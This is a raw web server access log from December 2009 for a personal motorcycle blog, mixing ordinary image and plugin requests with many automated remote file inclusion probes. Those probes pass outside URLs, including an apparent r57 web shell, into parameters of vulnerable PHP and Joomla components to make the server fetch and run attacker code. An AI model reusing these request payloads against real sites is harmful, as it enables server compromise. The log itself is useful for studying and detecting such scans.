24.22.69.180 - - [14/Dec/2009:10:02:43 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_066.jpg HTTP/1.1" 200 523240 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:43 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_053.jpg HTTP/1.0" 200 642316 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:43 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_067.jpg HTTP/1.1" 200 651731 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:44 -0800] "GET /blog/wp-content/plugins/xml-google-maps/xmlgooglemaps_googleMapsAPI.js HTTP/1.1" 200 3036 "http://dmulk.com/blog/wp-content/plugins/xml-google-maps/xmlgooglemaps_show.php?gpxid=4" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:44 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_049.jpg HTTP/1.1" 200 917099 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:44 -0800] "GET /blog/wp-content/plugins/xml-google-maps/images/pluginbanner_left.png HTTP/1.1" 200 3991 "http://dmulk.com/blog/wp-content/plugins/xml-google-maps/xmlgooglemaps_show.php?gpxid=4" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:44 -0800] "GET /blog/wp-content/plugins/xml-google-maps/icons/fullscreen.png HTTP/1.1" 200 3265 "http://dmulk.com/blog/wp-content/plugins/xml-google-maps/xmlgooglemaps_show.php?gpxid=4" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:44 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:45 -0800] "GET /blog/index.php?slideshow=true&gid=18&927 HTTP/1.1" 200 8715 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:45 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/010.jpg HTTP/1.1" 200 283336 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:02:58 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/048.jpg HTTP/1.1" 200 551887 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:03:12 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/060.jpg HTTP/1.1" 200 396547 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:03:26 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/002.jpg HTTP/1.1" 200 421873 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:03:39 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/046.jpg HTTP/1.1" 200 428741 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
69.72.144.34 - - [14/Dec/2009:10:05:44 -0800] "GET /logs/access_090322.log%20//modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:10:07:46 -0800] "GET /logs/access_080718.log//modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:08:10 -0800] "GET /logs/access_090826.log//administrator/components/com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
208.104.51.73 - - [14/Dec/2009:10:09:53 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.dmulk.com"
74.63.9.116 - - [14/Dec/2009:10:10:45 -0800] "GET /logs/access_080718.log/announcements.php?phpraid_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
74.63.9.116 - - [14/Dec/2009:10:10:57 -0800] "GET /logs/access_091007.log/announcements.php?phpraid_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
92.84.90.1 - - [14/Dec/2009:10:11:12 -0800] "GET /bikes/2k6klr650/klr005.JPG HTTP/1.0" 200 98538 "http://www.advrider.com/forums/showthread.php?t=510774" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.dmulk.com"
92.84.90.1 - - [14/Dec/2009:10:11:14 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.dmulk.com"
92.84.90.1 - - [14/Dec/2009:10:11:15 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.dmulk.com"
92.84.90.1 - - [14/Dec/2009:10:11:20 -0800] "GET /bikes/2k6klr650/klr004.JPG HTTP/1.1" 200 216057 "http://www.advrider.com/forums/showthread.php?t=510774" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.dmulk.com"
92.84.90.1 - - [14/Dec/2009:10:11:22 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.dmulk.com"
92.84.90.1 - - [14/Dec/2009:10:11:32 -0800] "GET /bikes/2k6klr650/klr003.JPG HTTP/1.1" 200 299517 "http://www.advrider.com/forums/showthread.php?t=510774" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.dmulk.com"
92.84.90.1 - - [14/Dec/2009:10:11:33 -0800] "GET /bikes/2k6klr650/klr003.JPG HTTP/1.1" 200 299517 "http://www.advrider.com/forums/showthread.php?t=510774" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:10:14:02 -0800] "GET /logs/access_080412.log/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:10:14:12 -0800] "GET /logs/access_091026.log/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:10:14:48 -0800] "GET /logs/access_080412.log/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:10:14:56 -0800] "GET /logs/access_091026.log/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:10:15:38 -0800] "GET /logs/access_090216.log//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:10:15:41 -0800] "GET /logs/access_090325.log//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
196.1.30.252 - - [14/Dec/2009:10:16:17 -0800] "GET /file_upload.php?sbp=http://www.kortech.cn/bbs//skin/zero_vote/r57.txt???? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
196.216.47.14 - - [14/Dec/2009:10:16:17 -0800] "GET /logs/file_upload.php?sbp=http://www.kortech.cn/bbs//skin/zero_vote/r57.txt???? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
196.1.30.252 - - [14/Dec/2009:10:16:17 -0800] "GET /logs/access_080522.log/file_upload.php?sbp=http://www.kortech.cn/bbs//skin/zero_vote/r57.txt???? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
196.1.30.252 - - [14/Dec/2009:10:16:22 -0800] "GET /logs/access_071122.log/file_upload.php?sbp=http://www.kortech.cn/bbs//skin/zero_vote/r57.txt???? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:10:16:49 -0800] "GET /logs/access_080102.log/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:10:16:59 -0800] "GET /logs/access_080102.log/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.250.149.132 - - [14/Dec/2009:10:17:27 -0800] "GET /logs/?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lukas-wuerzburger.de/two?? HTTP/1.1" 200 130218 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
210.250.149.132 - - [14/Dec/2009:10:17:27 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lukas-wuerzburger.de/two?? HTTP/1.1" 200 15012 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
196.216.47.14 - - [14/Dec/2009:10:18:31 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.kortech.cn/bbs//skin/zero_vote/r57.txt???? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
196.216.47.14 - - [14/Dec/2009:10:18:31 -0800] "GET /logs/access_080522.log/components/com_simpleboard/file_upload.php?sbp=http://www.kortech.cn/bbs//skin/zero_vote/r57.txt???? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
196.1.30.252 - - [14/Dec/2009:10:18:31 -0800] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.kortech.cn/bbs//skin/zero_vote/r57.txt???? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
196.1.30.252 - - [14/Dec/2009:10:18:43 -0800] "GET /logs/access_071122.log/components/com_simpleboard/file_upload.php?sbp=http://www.kortech.cn/bbs//skin/zero_vote/r57.txt???? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:10:19:02 -0800] "GET /logs/access_090216.log//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:10:19:02 -0800] "GET /logs/access_090325.log//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:10:19:12 -0800] "GET /logs/access_080524.log%20//modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:20:28 -0800] "GET /xfsection/modify.php?dir_module=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:20:28 -0800] "GET /logs/access_080427.log//xfsection/modify.php?dir_module=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:20:28 -0800] "GET /logs//xfsection/modify.php?dir_module=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:20:28 -0800] "GET /logs/access_080427.log//xfsection/modify.php?dir_module=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:20:28 -0800] "GET /logs//xfsection/modify.php?dir_module=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:20:28 -0800] "GET /xfsection/modify.php?dir_module=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:20:33 -0800] "GET /logs/access_090919.log//xfsection/modify.php?dir_module=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:20:49 -0800] "GET /logs/access_090919.log//xfsection/modify.php?dir_module=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:23:05 -0800] "GET /logs/access_080427.log%20%20//xfsection/modify.php?dir_module=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:23:08 -0800] "GET /logs/access_080427.log%20%20//xfsection/modify.php?dir_module=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:23:09 -0800] "GET /logs/access_090919.log%20%20//xfsection/modify.php?dir_module=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:10:23:12 -0800] "GET /logs/access_090216.log//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:10:23:13 -0800] "GET /logs/access_090325.log//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:10:23:13 -0800] "GET /logs/access_090919.log%20%20//xfsection/modify.php?dir_module=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:10:24:11 -0800] "GET /logs/access_090510.log//skin/zero_vote/error.php?dir=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:10:24:11 -0800] "GET /skin/zero_vote/error.php?dir=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:10:24:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:10:24:16 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:10:25:01 -0800] "GET /logs/access_090216.log//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:10:25:01 -0800] "GET /logs/access_090325.log//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:10:25:20 -0800] "GET /logs/access_080901.log//modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:10:25:51 -0800] "GET /logs/access_080414.log//modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
74.63.9.116 - - [14/Dec/2009:10:28:23 -0800] "GET /logs/access_081224.log%20/arg.php?arg=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
74.63.9.116 - - [14/Dec/2009:10:28:23 -0800] "GET /logs/arg.php?arg=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
74.63.9.116 - - [14/Dec/2009:10:28:24 -0800] "GET /arg.php?arg=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:28:44 -0800] "GET /mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:28:44 -0800] "GET /logs/access_080214.log/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:28:44 -0800] "GET /logs/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:28:46 -0800] "GET /mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:28:46 -0800] "GET /logs/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:10:28:47 -0800] "GET /logs/access_080214.log/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.44.86.2 - - [14/Dec/2009:10:29:48 -0800] "GET /bikes/2k6klr650/klr005.JPG HTTP/1.1" 200 98538 "http://www.advrider.com/forums/showthread.php?t=510774" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.dmulk.com"
69.44.86.2 - - [14/Dec/2009:10:29:49 -0800] "GET /bikes/2k6klr650/klr004.JPG HTTP/1.1" 200 216057 "http://www.advrider.com/forums/showthread.php?t=510774" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.dmulk.com"
69.44.86.2 - - [14/Dec/2009:10:29:50 -0800] "GET /bikes/2k6klr650/klr003.JPG HTTP/1.1" 200 299517 "http://www.advrider.com/forums/showthread.php?t=510774" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.dmulk.com"
69.44.86.2 - - [14/Dec/2009:10:29:51 -0800] "GET /bikes/2k6klr650/klr001a.JPG HTTP/1.1" 200 325181 "http://www.advrider.com/forums/showthread.php?t=510774" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:10:30:59 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:10:30:59 -0800] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:10:30:59 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:10:30:59 -0800] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:10:31:25 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:10:31:25 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:10:31:26 -0800] "GET /logs/access_071125.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:10:31:26 -0800] "GET /logs/access_071016.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:10:31:26 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:10:31:26 -0800] "GET /logs/access_071016.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:10:31:26 -0800] "GET /logs/access_071125.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:10:31:26 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:10:32:26 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:10:32:26 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:10:32:36 -0800] "GET /logs/access_080613.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:10:32:36 -0800] "GET /logs/access_080330.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
